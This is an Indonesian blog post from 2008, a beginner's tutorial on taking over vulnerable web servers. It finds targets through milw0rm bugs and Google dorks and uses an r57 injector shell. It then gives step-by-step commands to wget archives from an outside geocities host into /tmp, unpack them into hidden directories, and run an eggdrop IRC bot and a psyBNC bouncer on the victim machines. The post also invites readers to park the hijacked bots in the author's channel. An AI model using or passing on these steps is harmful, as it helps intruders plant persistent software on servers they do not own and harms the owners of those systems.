Kamis, 31 Juli 2008

Cara Buat PSY



assalaamu'alaikum wr wb

mulai dari mana ya.....
wah saya ini cuma newbie, bagi yang telah banyak melanglang buana dalam dunia MIRC pasti ketawa melihat tulisan ini. sorry kalo gitu abaikan aja tulisan ini.

BIKIN BOT

1. Siapkan, situs koran kita www.milw0rm.com. cari cari bug-bug baru disana,perhatikan dork (kata kuncinya) dan file bugnya trus silahkan gerilya cari target dengan bantuan paman Google kekekeke. (maaf gak ada tulisan cari target).

2. Pilih lokasi directory yang writable dari target dengan memilih pada injector r57 itu ada kok.... atau biasanya directory yang writable berada di /var/tmp atau /tmp. misal kita memilih meletakkan file bot di /tmp maka ketik /tmp pada change directory untuk pindah ke directory tmp atau cd /tmp.

3. Donlot eggdropketik di comand wget www.geocities.com/menyunshop/atk.tar.gz

4. Ekstrak dengan comand tar -zxvf atk.tar.gz

5. Masuk ke directory .log dengan comand cd .log ato tambahin /.log di change directory.

6. Seting bot anda dengan comand contoh ./nadya (file_config) (nama_bot) (ident) (ip_target) (base_chanel) (nick_owner) -----> contoh ./nadya a menyun-jelek Freak 123.12.13.42 skife menyun (bingung cari ipnya target... gampang ketik /sbin/ifconfig | grep inet di shell ato ketik ajah di mirc /dns ( situs target) trus liat di status dalnet).

7. (ini bisa dilewati) Kalo situ mau nambahi tcl situ masuk dulu di directory scripts dan upload tcl yang diinginkan. trus untuk ngerun tcl nya kembali lagi ke directory .log dan ketik ./tcl -t (config mu tadi) (file tcl) misal ./tcl -t a badnick.tcl

8. Kalo udah ketik ./quene -m (nama file configmu tadi) , misal ./quene -m a tunggu di chan hingga bot masuk dan pv pass (password kamu).... ikuti perintah selanjutnya.

10. Oke cukup sudah... keseumanya itu kalo lancar....pasti banyak halangan untuk sampe semuanya itu....jangan lupa bagi target dan parkir botnya di chanelku #skife@dalnet he...he....he...


BIKIN PSYBNC

Ini lebih simple dari pada bikin bot, okeh kita asumsikan anda mempunyai target dan masuk pada direktory yang writable /var/tmp, /tmp ato yang lain

1. donlot... file psy dengan comand wget www.geocities.com/menyunshop/psy.tar.gz

2. ekstrak file dengan tar -zxvf psy.tar.gz

3. masuk pada direktory .psy dengan comand cd .psy atau tambahin /.psy pada change directory

4. configurasi port yang di inginkan dengan comand ./config 31310 (port ini terserah asal 4-5 digit angka)

5. trus tinggal ./run

6. okeh tinggal masuk ke mirc..ketik /s (nama server) (port) jangan lupa ident dan password yang pertama itu ident dan password yang dikenali psy sebagai admin.

7. trus setting server psy kamu.

sekian.

wassalaamu'alaikum wr wb

Tidak ada komentar:

Posting Komentar

kritik Dan Saran Anda, Saya Terima..?